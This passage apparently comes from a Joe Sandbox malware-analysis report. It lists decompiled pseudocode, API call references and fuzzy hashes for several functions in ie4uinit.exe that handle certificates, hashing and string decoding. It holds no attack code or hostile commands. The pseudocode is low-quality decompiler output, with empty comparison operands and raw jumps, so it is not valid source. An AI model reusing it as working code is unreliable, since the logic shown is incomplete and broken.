				_t45 =  ==  ? 1 : _t44;
				_t80 =  ==  ? 1 : _t44;
				if (( ==  ? 1 : _t44) > 0) goto 0x319def53;
				_t58 =  ==  ? 1 : GetLastError();
				goto 0x319def67;
				_t47 = GetLastError();
				_t48 =  ==  ? 1 : _t47;
				_t59 = ( ==  ? 1 : _t47) & 0x0000ffff;
				_t60 = ( ==  ? 1 : _t47) & 0x0000ffff | 0x80070000;
				E00007FF77FF7319C1698(_t17, _t113);
				goto 0x319def88;
				if (_t113 == 0) goto 0x319def83;
				E00007FF77FF7319C1698(_t17, _t113);
				if (_t110 == 0) goto 0x319def90;
				E00007FF77FF7319C1698(_t87, _t110);
				return 0x8007000e;
			}

0x7ff7319ded98
0x7ff7319ded98
0x7ff7319ded98
0x7ff7319ded9b
0x7ff7319ded9f
0x7ff7319deda3
0x7ff7319deda7
0x7ff7319dedb3
0x7ff7319dedb7
0x7ff7319dedba
0x7ff7319dedc2
0x7ff7319dedce
0x7ff7319dedd1
0x7ff7319dedd6
0x7ff7319deddf
0x7ff7319dede8
0x7ff7319dedee
0x7ff7319dedf6
0x7ff7319dedfc
0x7ff7319dedfe
0x7ff7319dee0d
0x7ff7319dee10
0x7ff7319dee26
0x7ff7319dee29
0x7ff7319dee2f
0x7ff7319dee36
0x7ff7319dee45
0x7ff7319dee4d
0x7ff7319dee5b
0x7ff7319dee63
0x7ff7319dee69
0x7ff7319dee69
0x7ff7319dee74
0x7ff7319dee79
0x7ff7319dee79
0x7ff7319dee7d
0x7ff7319dee83
0x7ff7319dee8b
0x7ff7319dee8b
0x7ff7319dee9b
0x7ff7319deea3
0x7ff7319deeb1
0x7ff7319deeb3
0x7ff7319deec8
0x7ff7319deed5
0x7ff7319deedc
0x7ff7319deeea
0x7ff7319deef2
0x7ff7319deefc
0x7ff7319def08
0x7ff7319def0e
0x7ff7319def14
0x7ff7319def23
0x7ff7319def27
0x7ff7319def2e
0x7ff7319def30
0x7ff7319def3d
0x7ff7319def40
0x7ff7319def42
0x7ff7319def4e
0x7ff7319def51
0x7ff7319def53
0x7ff7319def5b
0x7ff7319def5e
0x7ff7319def61
0x7ff7319def6a
0x7ff7319def6f
0x7ff7319def79
0x7ff7319def7e
0x7ff7319def86
0x7ff7319def8b
0x7ff7319defa8

APIs

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

memcpy_s.MSVCRT ref: 00007FF7319DEE10
memcpy_s.MSVCRT ref: 00007FF7319DEE29
CryptGenRandom.ADVAPI32 ref: 00007FF7319DEE45
memcpy_s.MSVCRT ref: 00007FF7319DEE63
EnterCriticalSection.KERNEL32 ref: 00007FF7319DEE7D
LeaveCriticalSection.KERNEL32 ref: 00007FF7319DEEEA
GetLastError.KERNEL32 ref: 00007FF7319DEF30
GetLastError.KERNEL32 ref: 00007FF7319DEF44
GetLastError.KERNEL32 ref: 00007FF7319DEF53

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLastmemcpy_s$CriticalSection$CryptEnterHeapLeaveProcessRandom
String ID:
API String ID: 2737344278-0
Opcode ID: c20fa271f65cf2aa6819efbf1ba4857f7df93e4172a13f99332462aaabf75c36
Instruction ID: 5f25dcb9b590287d3989d8c903fd1e165e66cfa414a2207dbdfb536a36fdc51d
Opcode Fuzzy Hash: c20fa271f65cf2aa6819efbf1ba4857f7df93e4172a13f99332462aaabf75c36
Instruction Fuzzy Hash: 1D51D632F087C69AE750AF25E8446A9A7A0FB84FC8F844035EE4D83759DEBCE405D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DE950 Relevance: 13.6, APIs: 9, Instructions: 92
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF77FF7319DE950(long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, void* _a16, void* _a24, void* _a32) {
				signed int _v40;
				void* __rdi;
				void* _t30;
				void* _t31;
				long _t32;
				signed short _t36;
				long _t37;
				long _t40;
				void* _t46;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t71;
				void* _t82;
				void* _t86;
				intOrPtr _t89;
				void* _t91;
				void* _t100;
				void* _t102;

				_t73 = __rbx;
				_t71 = _t91;
				 *((long long*)(_t71 + 0x10)) = __rbx;
				 *((long long*)(_t71 + 0x18)) = __rbp;
				 *((long long*)(_t71 + 0x20)) = __rsi;
				_t89 =  *((intOrPtr*)(__rcx + 0x38));
				_t86 = __rcx;
				 *(__rcx + 0x40) =  *(__rcx + 0x40) & 0x00000000;
				 *(__rcx + 0x68) =  *(__rcx + 0x68) & 0x00000000;
				 *(__rcx + 0x70) =  *(__rcx + 0x70) & 0x00000000;
				_t30 = E00007FF77FF7319DF73C(_t53, _t56, _t71, __rbx, _t71 + 8, _t102);
				r12d = 1;
				if (_t30 < 0) goto 0x319dea16;
				_t31 = E00007FF77FF7319DF7CC(_t30, _t73, _a8, _t86 + 0x68, _a8, _t86, _t89, _t86 + 0x70, _t100, _t82);
				if (_t31 < 0) goto 0x319dea0d;
				__imp__CryptImportPublicKeyInfo();
				if (_t31 == 0) goto 0x319de9d8;
				 *((long long*)(_t86 + 0x40)) = _a8;
				goto 0x319dea0d;
				_t32 = GetLastError();
				_t33 =  ==  ? r12d : _t32;
				_t61 =  ==  ? r12d : _t32;
				if (( ==  ? r12d : _t32) > 0) goto 0x319de9f8;
				_t46 =  ==  ? r12d : GetLastError();
				goto 0x319dea0d;
				_t36 =  ==  ? r12d : GetLastError();
				__imp__CertFreeCertificateContext();
				if ((_t36 & 0x0000ffff | 0x80070000) < 0) goto 0x319dea7e;
				_v40 = _v40 & 0x00000000;
				_a8 = 4;
				__imp__CryptGetKeyParam();
				if (_t36 == 0) goto 0x319dea49;
				 *(_t86 + 0x48) =  *(_t86 + 0x48) >> 3;
				goto 0x319dea7e;
				_t37 = GetLastError();
				_t38 =  ==  ? r12d : _t37;
				_t67 =  ==  ? r12d : _t37;
				if (( ==  ? r12d : _t37) > 0) goto 0x319dea69;
				_t50 =  ==  ? r12d : GetLastError();
				goto 0x319dea7e;
				_t40 = GetLastError();
				_t41 =  ==  ? r12d : _t40;
				_t51 = ( ==  ? r12d : _t40) & 0x0000ffff;
				_t52 = ( ==  ? r12d : _t40) & 0x0000ffff | 0x80070000;
				return ( ==  ? r12d : _t40) & 0x0000ffff | 0x80070000;
			}

0x7ff7319de950
0x7ff7319de950
0x7ff7319de953
0x7ff7319de957
0x7ff7319de95b
0x7ff7319de968
0x7ff7319de96c
0x7ff7319de96f
0x7ff7319de974
0x7ff7319de979
0x7ff7319de981
0x7ff7319de988
0x7ff7319de990
0x7ff7319de9a6
0x7ff7319de9af
0x7ff7319de9c3
0x7ff7319de9cb
0x7ff7319de9d2
0x7ff7319de9d6
0x7ff7319de9d8
0x7ff7319de9e0
0x7ff7319de9e4
0x7ff7319de9e6
0x7ff7319de9f2
0x7ff7319de9f6
0x7ff7319dea00
0x7ff7319dea10
0x7ff7319dea18
0x7ff7319dea23
0x7ff7319dea31
0x7ff7319dea39
0x7ff7319dea41
0x7ff7319dea43
0x7ff7319dea47
0x7ff7319dea49
0x7ff7319dea51
0x7ff7319dea55
0x7ff7319dea57
0x7ff7319dea63
0x7ff7319dea67
0x7ff7319dea69
0x7ff7319dea71
0x7ff7319dea75
0x7ff7319dea78
0x7ff7319dea98

APIs

Part of subcall function 00007FF7319DF73C: CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7319DF76A
Part of subcall function 00007FF7319DF73C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7319DE986,?,?,00007FF7319DE79F), ref: 00007FF7319DF778
Part of subcall function 00007FF7319DF73C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7319DE986,?,?,00007FF7319DE79F), ref: 00007FF7319DF78C
Part of subcall function 00007FF7319DF73C: CertCloseStore.CRYPT32 ref: 00007FF7319DF7B6

CryptGetKeyParam.ADVAPI32(?,?,00007FF7319DE79F), ref: 00007FF7319DEA39

Part of subcall function 00007FF7319DF7CC: CertGetCertificateContextProperty.CRYPT32 ref: 00007FF7319DF7FC
Part of subcall function 00007FF7319DF7CC: CertGetCertificateContextProperty.CRYPT32 ref: 00007FF7319DF821

CryptImportPublicKeyInfo.CRYPT32 ref: 00007FF7319DE9C3
GetLastError.KERNEL32(?,?,00007FF7319DE79F), ref: 00007FF7319DE9D8
GetLastError.KERNEL32(?,?,00007FF7319DE79F), ref: 00007FF7319DE9E8
CertFreeCertificateContext.CRYPT32 ref: 00007FF7319DEA10
GetLastError.KERNEL32(?,?,00007FF7319DE79F), ref: 00007FF7319DEA49
GetLastError.KERNEL32(?,?,00007FF7319DE79F), ref: 00007FF7319DEA59
GetLastError.KERNEL32(?,?,00007FF7319DE79F), ref: 00007FF7319DEA69

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Cert$CertificateContext$CryptPropertyStore$CertificatesCloseEnumFreeImportInfoParamPublic
String ID:
API String ID: 506061795-0
Opcode ID: 2775827cc976ad45cae2bac6d5be6874044f2555a188ede1d5e4ecd2066bf15f
Instruction ID: c3b08843c892e833486ac9ba089686614ea73817cfd31a493bd0fb050b7a9a4b
Opcode Fuzzy Hash: 2775827cc976ad45cae2bac6d5be6874044f2555a188ede1d5e4ecd2066bf15f
Instruction Fuzzy Hash: 4E318232F08B869BE710AB66D48836AA3A0FF44B58F844035CA4D87658DFFCE455E320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CC92C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 212
memorywindowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E00007FF77FF7319CC92C(void* __edx, void* __edi, long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int* __r8, void* __r9) {
				void* __rdi;
				void* _t47;
				signed int _t54;
				void* _t55;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t66;
				void* _t74;
				void* _t94;
				void* _t97;
				intOrPtr _t114;
				intOrPtr _t116;
				signed int* _t121;
				intOrPtr* _t129;
				signed int _t131;
				void* _t155;
				void* _t158;
				long long _t160;
				void* _t161;
				void* _t163;
				void* _t164;
				intOrPtr _t169;
				void* _t176;
				signed long long _t178;
				int _t180;
				signed int* _t181;
				struct HWND__* _t183;

				 *((long long*)(_t163 + 0x10)) = __rbx;
				 *((long long*)(_t163 + 0x18)) = _t160;
				 *((long long*)(_t163 + 0x20)) = __rsi;
				_t164 = _t163 - 0x20;
				r13d = 0;
				_t181 = __r8;
				_t158 = __rdx;
				_t161 = __rcx;
				_t4 = _t178 + 1; // 0x1
				_t66 = _t4;
				 *__r8 = _t66;
				if (( *0x319f4ec0 & 0x00000008) == 0) goto 0x319cc974;
				r8d =  *((intOrPtr*)(__rdx + 0x30));
				E00007FF77FF7319CB850( *0x319f4ec0 & 0x00000008);
				_t114 =  *((intOrPtr*)(_t161 + 8));
				if (_t114 == 0) goto 0x319ccba8;
				if ( *((intOrPtr*)(__rdx + 0x10)) != _t114) goto 0x319ccba8;
				r12b = 0;
				r15b = 0;
				 *(_t164 + 0x50) = r12b;
				dil = _t66;
				if ( *((intOrPtr*)(__rdx + 0x30)) != _t66) goto 0x319ccac5;
				if ( *((intOrPtr*)(__rdx + 0x40)) - r13d < 0) goto 0x319ccab3;
				_t47 = E00007FF77FF7319CC5F0(_t66, __edi, __rbx, _t161, __rdx, __rdx, _t161, __r8, _t164 + 0x50);
				if ( *(_t164 + 0x50) == r13b) goto 0x319cca0b;
				 *(_t164 + 0x50) =  *(_t164 + 0x50) & _t178;
				__imp__SHStrDupW();
				if (_t47 < 0) goto 0x319cca0b;
				r9d = 0;
				if (PostMessageW(_t183, _t180) != 0) goto 0x319cca0b;
				0x319e4113();
				_t121 = _t158 + 0x20;
				_t129 =  *_t121;
				if (_t129 == 0) goto 0x319cca27;
				_t116 =  *((intOrPtr*)( *_t129 + 0x10));
				 *0x319e7038();
				 *_t121 =  *_t121 & _t178;
				E00007FF77FF7319CE4E0(_t121,  *((intOrPtr*)(_t158 + 0x10)), _t121, _t158, _t161);
				_t131 =  *_t121;
				if (_t131 == 0) goto 0x319cca4d;
				if ( *((intOrPtr*)(_t158 + 0x18)) == 0) goto 0x319cca4d;
				_t94 = E00007FF77FF7319CEEF0( *((intOrPtr*)(_t158 + 0x18)), _t121, _t131,  *((intOrPtr*)(_t158 + 0x18)), _t155, _t158, _t161, _t178, _t176);
				if (_t94 != 0) goto 0x319cca57;
				r15b = 1;
				goto 0x319cca5c;
				_t169 =  *((intOrPtr*)(_t158 + 0x10));
				if (_t94 == 0) goto 0x319ccabd;
				if (_t94 == 0) goto 0x319cca78;
				if ( *((intOrPtr*)(_t169 + 0x70)) != 1) goto 0x319ccabd;
				goto 0x319cca7a;
				_t74 =  ==  ? 1 :  *((intOrPtr*)(_t169 + 0x30));
				r9d = 0;
				_t97 = _t74;
				if (_t97 == 0) goto 0x319cca9e;
				if (_t97 == 0) goto 0x319cca9b;
				if (_t74 - 1 != 1) goto 0x319cca9e;
				r9d = _t131 + 1;
				goto 0x319cca9e;
				r9d = 1;
				_t54 = E00007FF77FF7319CCC04(_t116, _t121,  *((intOrPtr*)(_t158 + 0x48)), _t161, _t169);
				r13d = _t54;
				if (_t54 != 0) goto 0x319ccabd;
				dil = 0;
				goto 0x319ccabd;
				r8d = 0;
				_t55 = E00007FF77FF7319CD658(1, _t116, _t121, _t131);
				r12b = dil;
				goto 0x319ccb76;
				if (_t55 != 2) goto 0x319ccb33;
				__imp__#2();
				_t122 = _t116;
				if (_t116 == 0) goto 0x319ccbf6;
				r9d = 0;
				r8d = 0x400;
				__imp__#314();
				__imp__#6();
				if (_t55 != 1) goto 0x319ccb13;
				if ( *(_t158 + 0x40) - r13d < 0) goto 0x319ccb29;
				_t56 = E00007FF77FF7319CC5F0(1, _t55, _t116, _t161, _t158, _t158, _t161, _t181, _t164 + 0x50);
				r13d = _t56;
				r15d =  *(_t158 + 0x40);
				r15d = r15d >> 0x1f;
				goto 0x319ccb7b;
				if (_t56 != 3) goto 0x319ccb6e;
				_t57 = E00007FF77FF7319CC5F0(1, _t55, _t116, _t161, _t158, _t158, _t161, _t181, _t164 + 0x50);
				r13d = _t57;
				if (_t57 < 0) goto 0x319ccb7b;
				if (E00007FF77FF7319CBB6C(_t57, _t116, _t116, _t158, _t161) == 0) goto 0x319ccb7b;
				if ( *((intOrPtr*)(_t158 + 0x18)) == 0) goto 0x319ccb7b;
				_t59 = E00007FF77FF7319CC058(_t116, _t116,  *((intOrPtr*)(_t158 + 0x18)));
				goto 0x319ccb7b;
				if (_t59 != 4) goto 0x319ccb7b;
				dil = 0;
				if (dil == 0) goto 0x319ccb88;
				r8d = 0;
				E00007FF77FF7319CC16C(_t122, _t161,  *((intOrPtr*)(_t158 + 0x18)), _t158, _t155);
				if (r15b == 0) goto 0x319ccb97;
				E00007FF77FF7319CD760(1, _t161,  *((intOrPtr*)(_t158 + 0x18)));
				if (r12b == 0) goto 0x319ccba8;
				E00007FF77FF7319CCD94(_t116, _t122, _t161,  *((intOrPtr*)(_t158 + 0x48)), _t158);
				if (( *0x319f4ec0 & 0x00000008) == 0) goto 0x319ccbc1;
				r8d =  *((intOrPtr*)(_t158 + 0x30));
				E00007FF77FF7319CB850( *0x319f4ec0 & 0x00000008);
				if (_t158 == 0) goto 0x319ccbd6;
				 *0x319e7038();
				return r13d;
			}

0x7ff7319cc92c
0x7ff7319cc931
0x7ff7319cc936
0x7ff7319cc944
0x7ff7319cc948
0x7ff7319cc94b
0x7ff7319cc94e
0x7ff7319cc951
0x7ff7319cc954
0x7ff7319cc954
0x7ff7319cc958
0x7ff7319cc962
0x7ff7319cc964
0x7ff7319cc96f
0x7ff7319cc974
0x7ff7319cc97b
0x7ff7319cc985
0x7ff7319cc98e
0x7ff7319cc991
0x7ff7319cc994
0x7ff7319cc999
0x7ff7319cc99e
0x7ff7319cc9ab
0x7ff7319cc9bc
0x7ff7319cc9c6
0x7ff7319cc9d1
0x7ff7319cc9dd
0x7ff7319cc9e5
0x7ff7319cc9ec
0x7ff7319cc9ff
0x7ff7319cca06
0x7ff7319cca0b
0x7ff7319cca0f
0x7ff7319cca15
0x7ff7319cca1a
0x7ff7319cca1e
0x7ff7319cca24
0x7ff7319cca2e
0x7ff7319cca33
0x7ff7319cca39
0x7ff7319cca42
0x7ff7319cca49
0x7ff7319cca4b
0x7ff7319cca52
0x7ff7319cca55
0x7ff7319cca5c
0x7ff7319cca67
0x7ff7319cca6c
0x7ff7319cca71
0x7ff7319cca76
0x7ff7319cca81
0x7ff7319cca84
0x7ff7319cca87
0x7ff7319cca89
0x7ff7319cca8e
0x7ff7319cca93
0x7ff7319cca95
0x7ff7319cca99
0x7ff7319cca9b
0x7ff7319ccaa2
0x7ff7319ccaa7
0x7ff7319ccaac
0x7ff7319ccaae
0x7ff7319ccab1
0x7ff7319ccab3
0x7ff7319ccab8
0x7ff7319ccabd
0x7ff7319ccac0
0x7ff7319ccac8
0x7ff7319ccad1
0x7ff7319ccad7
0x7ff7319ccadd
0x7ff7319ccae7
0x7ff7319ccaea
0x7ff7319ccaf3
0x7ff7319ccafe
0x7ff7319ccb0b
0x7ff7319ccb11
0x7ff7319ccb21
0x7ff7319ccb26
0x7ff7319ccb29
0x7ff7319ccb2d
0x7ff7319ccb31
0x7ff7319ccb36
0x7ff7319ccb46
0x7ff7319ccb4b
0x7ff7319ccb50
0x7ff7319ccb5c
0x7ff7319ccb65
0x7ff7319ccb67
0x7ff7319ccb6c
0x7ff7319ccb71
0x7ff7319ccb73
0x7ff7319ccb79
0x7ff7319ccb7b
0x7ff7319ccb83
0x7ff7319ccb8b
0x7ff7319ccb92
0x7ff7319ccb9a
0x7ff7319ccba3
0x7ff7319ccbaf
0x7ff7319ccbb1
0x7ff7319ccbbc
0x7ff7319ccbc4
0x7ff7319ccbd0
0x7ff7319ccbf5

APIs

SHStrDupW.SHLWAPI ref: 00007FF7319CC9DD
PostMessageW.USER32 ref: 00007FF7319CC9F7
CoTaskMemFree.OLE32 ref: 00007FF7319CCA06
SysAllocString.OLEAUT32 ref: 00007FF7319CCAD1
VarBstrCmp.OLEAUT32 ref: 00007FF7319CCAF3
SysFreeString.OLEAUT32 ref: 00007FF7319CCAFE

Strings

searchscope, xrefs: 00007FF7319CC9D6

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: FreeString$AllocBstrMessagePostTask
String ID: searchscope
API String ID: 3622073155-110112929
Opcode ID: 37f70af6f447b2250a3a87e0daa853a576a026bf5d156e6f44af05d9dc9db48b
Instruction ID: 0f861a92a1c1c95e3916bcbb455c79ac6498433524b3ea98777c04bcb8751d97
Opcode Fuzzy Hash: 37f70af6f447b2250a3a87e0daa853a576a026bf5d156e6f44af05d9dc9db48b
Instruction Fuzzy Hash: E4818521E086C266EB64EB65D45417AEB60BF45F8CF844035DECE07A9DCEADE405EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D544C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00007FF77FF7319D544C(void* __eax, void* __esi, void* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rbp, signed int* __r8, void* __r9, signed int _a8, long long _a16, long long _a24) {
				void* _v40;
				long long _v56;
				long long _v64;
				long long _v72;
				void* _t27;
				void* _t32;
				void* _t47;
				long long _t56;
				void* _t66;
				long long _t68;
				void* _t77;
				signed int* _t80;

				_t77 = __r9;
				_a16 = __rbx;
				_a24 = __rbp;
				_t80 = __r8;
				if (__rcx == 0) goto 0x319d55ac;
				if (__rdx == 0) goto 0x319d55ac;
				if (__r8 == 0) goto 0x319d55ac;
				 *__rdx = __rbx;
				 *((intOrPtr*)(__r8)) = 0;
				__imp__strnlen();
				if (__rax - 1 - 0x1ffe > 0) goto 0x319d55a3;
				if (__rax == 0) goto 0x319d54ea;
				r12d =  *(_t66 + __rcx) & 0x000000ff;
				__imp__isalnum();
				if (__eax != 0) goto 0x319d54e2;
				_t47 = r12b - 0x3d;
				if (_t47 > 0) goto 0x319d5577;
				asm("dec esp");
				if (_t47 >= 0) goto 0x319d5577;
				if (_t66 + 1 - __rax < 0) goto 0x319d54b2;
				r9d = 0;
				_v56 = __rbx;
				_t56 =  &_a8;
				_v64 = __rbx;
				_a8 = 0;
				_v72 = _t56;
				_t9 = _t77 + 1; // 0x1
				r8d = _t9;
				__imp__CryptStringToBinaryA();
				if (__eax == 0) goto 0x319d558d;
				r12d = _a8;
				E00007FF77FF7319C1670();
				_t68 = _t56;
				if (_t56 == 0) goto 0x319d5586;
				_v56 = __rbx;
				_v64 = __rbx;
				r8d = 1;
				_v72 =  &_a8;
				__imp__CryptStringToBinaryA();
				if (__eax != 0) goto 0x319d557e;
				_t27 =  <=  ? GetLastError() : _t19 & 0x0000ffff | 0x80070000;
				E00007FF77FF7319C1698( &_a8, _t68);
				goto 0x319d55a8;
				goto 0x319d55a8;
				 *__rdx = _t68;
				 *_t80 = r12d;
				goto 0x319d55a8;
				goto 0x319d55a8;
				_t32 =  <=  ? GetLastError() : _t21 & 0x0000ffff | 0x80070000;
				goto 0x319d55a8;
				goto 0x319d55b1;
				return 0x80070057;
			}

0x7ff7319d544c
0x7ff7319d544c
0x7ff7319d5451
0x7ff7319d5464
0x7ff7319d5470
0x7ff7319d5479
0x7ff7319d5482
0x7ff7319d5488
0x7ff7319d5490
0x7ff7319d5493
0x7ff7319d54a5
0x7ff7319d54b0
0x7ff7319d54b2
0x7ff7319d54ba
0x7ff7319d54c2
0x7ff7319d54c4
0x7ff7319d54c8
0x7ff7319d54d8
0x7ff7319d54dc
0x7ff7319d54e8
0x7ff7319d54ea
0x7ff7319d54ed
0x7ff7319d54f2
0x7ff7319d54f7
0x7ff7319d54fe
0x7ff7319d5505
0x7ff7319d550a
0x7ff7319d550a
0x7ff7319d550e
0x7ff7319d5516
0x7ff7319d5518
0x7ff7319d5520
0x7ff7319d5525
0x7ff7319d552b
0x7ff7319d552d
0x7ff7319d5537
0x7ff7319d553f
0x7ff7319d5545
0x7ff7319d554f
0x7ff7319d5557
0x7ff7319d556d
0x7ff7319d5570
0x7ff7319d5575
0x7ff7319d557c
0x7ff7319d557e
0x7ff7319d5581
0x7ff7319d5584
0x7ff7319d558b
0x7ff7319d559e
0x7ff7319d55a1
0x7ff7319d55aa
0x7ff7319d55c9

APIs

strnlen.MSVCRT ref: 00007FF7319D5493
isalnum.MSVCRT ref: 00007FF7319D54BA
CryptStringToBinaryA.CRYPT32 ref: 00007FF7319D550E
CryptStringToBinaryA.CRYPT32 ref: 00007FF7319D554F
GetLastError.KERNEL32 ref: 00007FF7319D5559
GetLastError.KERNEL32 ref: 00007FF7319D558D

Strings

thumbprint, xrefs: 00007FF7319D5456

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: BinaryCryptErrorLastString$isalnumstrnlen
String ID: thumbprint
API String ID: 3213271566-1670052307
Opcode ID: 6baa1e2f041215ea4219d63a9758e832fd4e1e74504ae30f35ad77c70d18b645
Instruction ID: e5b2c21281dda22b7c8f0f453be0f5b74b13d2ca5734495feb6c8de47aeb1aab
Opcode Fuzzy Hash: 6baa1e2f041215ea4219d63a9758e832fd4e1e74504ae30f35ad77c70d18b645
Instruction Fuzzy Hash: 2D41E322F0C782A6F711AF11A548379A3A5BF44B98FD48135DE8D83758DEBDE441A720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D73D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00007FF77FF7319D73D0(void* __eax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r9, void* _a8, intOrPtr _a16, void* _a24, void* _a32) {
				void* _v24;
				signed int _v40;
				signed short _t20;
				void* _t26;
				void* _t50;
				void* _t58;
				void* _t64;

				_t64 = _t58;
				 *((long long*)(_t64 + 8)) = __rbx;
				 *((long long*)(_t64 + 0x18)) = __rbp;
				 *((long long*)(_t64 + 0x20)) = __rsi;
				if (__rdx == 0) goto 0x319d74a3;
				if (__r9 == 0) goto 0x319d74a3;
				 *(_t64 - 0x18) =  *(_t64 - 0x18) & 0x00000000;
				r9d = 0;
				r8d = 0;
				 *((long long*)(_t64 - 0x28)) = _t64 - 0x18;
				__imp__CryptCreateHash(_t50);
				if (__eax == 0) goto 0x319d748f;
				r9d = 0;
				__imp__CryptHashData();
				if (__eax == 0) goto 0x319d746e;
				_v40 = _v40 & 0x00000000;
				_a16 = 0x20;
				__imp__CryptGetHashParam();
				if (__eax == 0) goto 0x319d746e;
				goto 0x319d7482;
				_t26 =  <=  ? GetLastError() : _t19 & 0x0000ffff | 0x80070000;
				__imp__CryptDestroyHash();
				goto 0x319d74a3;
				_t20 = GetLastError();
				_t29 =  <=  ? _t20 : _t20 & 0x0000ffff | 0x80070000;
				_t21 =  <=  ? _t20 : _t20 & 0x0000ffff | 0x80070000;
				return  <=  ? _t20 : _t20 & 0x0000ffff | 0x80070000;
			}

0x7ff7319d73d0
0x7ff7319d73d3
0x7ff7319d73d7
0x7ff7319d73db
0x7ff7319d73f5
0x7ff7319d73fe
0x7ff7319d740b
0x7ff7319d7410
0x7ff7319d7413
0x7ff7319d7416
0x7ff7319d741f
0x7ff7319d7427
0x7ff7319d742e
0x7ff7319d7437
0x7ff7319d743f
0x7ff7319d744b
0x7ff7319d7458
0x7ff7319d7460
0x7ff7319d7468
0x7ff7319d746c
0x7ff7319d747f
0x7ff7319d7487
0x7ff7319d748d
0x7ff7319d748f
0x7ff7319d74a0
0x7ff7319d74a8
0x7ff7319d74b9

APIs

CryptCreateHash.ADVAPI32 ref: 00007FF7319D741F
CryptHashData.ADVAPI32 ref: 00007FF7319D7437
CryptGetHashParam.ADVAPI32 ref: 00007FF7319D7460
GetLastError.KERNEL32 ref: 00007FF7319D746E
CryptDestroyHash.ADVAPI32 ref: 00007FF7319D7487
GetLastError.KERNEL32 ref: 00007FF7319D748F

Strings

, xrefs: 00007FF7319D7458

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

